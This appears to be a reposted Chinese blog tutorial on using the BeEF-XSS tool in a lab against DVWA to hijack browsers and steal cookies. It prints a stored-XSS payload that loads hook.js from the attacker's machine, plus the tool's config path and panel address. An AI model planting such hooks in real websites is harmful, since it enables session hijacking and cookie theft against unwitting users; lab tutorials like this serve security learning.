【beef-xss】

移动开发 2023-07-15 19:44:23 阅读次数: 0

文章目录

前言
一、使用的工具
二、使用步骤
总结

前言

xss漏洞可以拿来做什么呢?只是弹窗吗？不，我们的目的是盗取用户cookie,配合工具还可查看文件管理

一、使用的工具

1.DVWA漏洞演示平台 win7:192.168.0.113

2.攻击工具：kali中自带的Beef-xss kali:192.168.0.111

二、使用步骤

1.登录dvwa界面，安全等级low

在这里插入图片描述

2.打开beef-xss工具

kali中自带此工具，打开终端输入beef-xss即可，首次使用需要修改默认的账号密码。
若后期忘记密码可以查看配置文件/etc/beef-xss/config.yaml。登录地址为：http://127.0.0.1:3000/ui/panel
在这里插入图片描述

3.写入xss代码

接着根据beef-xss的提示在存在存储型XSS漏洞处插入恶意代码：

<script src="http://192.168.0.111:3000/hook.js"></script>

为攻击IP地址，然后等鱼上钩即可。
使用另一台测试机访问被插入恶意代码的网页，在beef-xss中就可以看到鱼儿上钩。

在这里插入图片描述

成功上线
在这里插入图片描述

4.获取cookie

在这里插入图片描述

还可以查看网络结构
在这里插入图片描述

总结

本期主要介绍了beef-xss的简单用法

猜你喜欢

转载自blog.csdn.net/qq_61872115/article/details/126740489

【beef-xss】

Beef-XSS和MSF的利用

BeEF-XSS详细使用教程

kali新手入门教学(7）--beef-xss的安装，配置，debug

Beef xss神器

XSS - beef（使用）

XSS漏洞 BEEF工具的使用

XSS-beef cookie盗取

安全（三）：XSS攻击（beef 使用）

浅谈一下xss工具----beef

BeEF

Kali Linux之速会BEEF & XSS攻击

【Kali渗透全方位实战】利用Beef进行XSS会话劫持（XSS Stored）

BeEF框架

beef使用

BeEF介绍

beef的使用

xss

-XSS

ubuntu 安装 beef

Beef加载MSF插件

【原创】beef&msf

BEEF的使用（简单版）

Beef介绍与安装使用

Kali使用beef

Beef工具使用

beef +metasploit关联

beef+metasploit配置方法

修改BeEF工具默认密码

kali之beef得介绍

今日推荐

Apache Doris 2.0.10 版本正式发布！

开源日报 | 大模型开战；大模型独角兽被曝卖身；周鸿祎建议谷歌开源所有产品；最大开源AI社区提供1000万美元共享GPU

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

周排行

阿里云短信服务平台注册

Windows下的字符串处理(1)

sqoop: mysql导入数据到hdfs, hive, hbase

commons.lang中常用的工具类

离线安装PostgreSQL11.6

使用PyTorch简单实现卷积神经网络模型

一文彻底搞定谱聚类

一道面试题引发的血案

One Chat for Mac(聊天工具)

TCP/IP的底层队列是如何实现的？

每日归档

更多

2024-05-17(34)

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)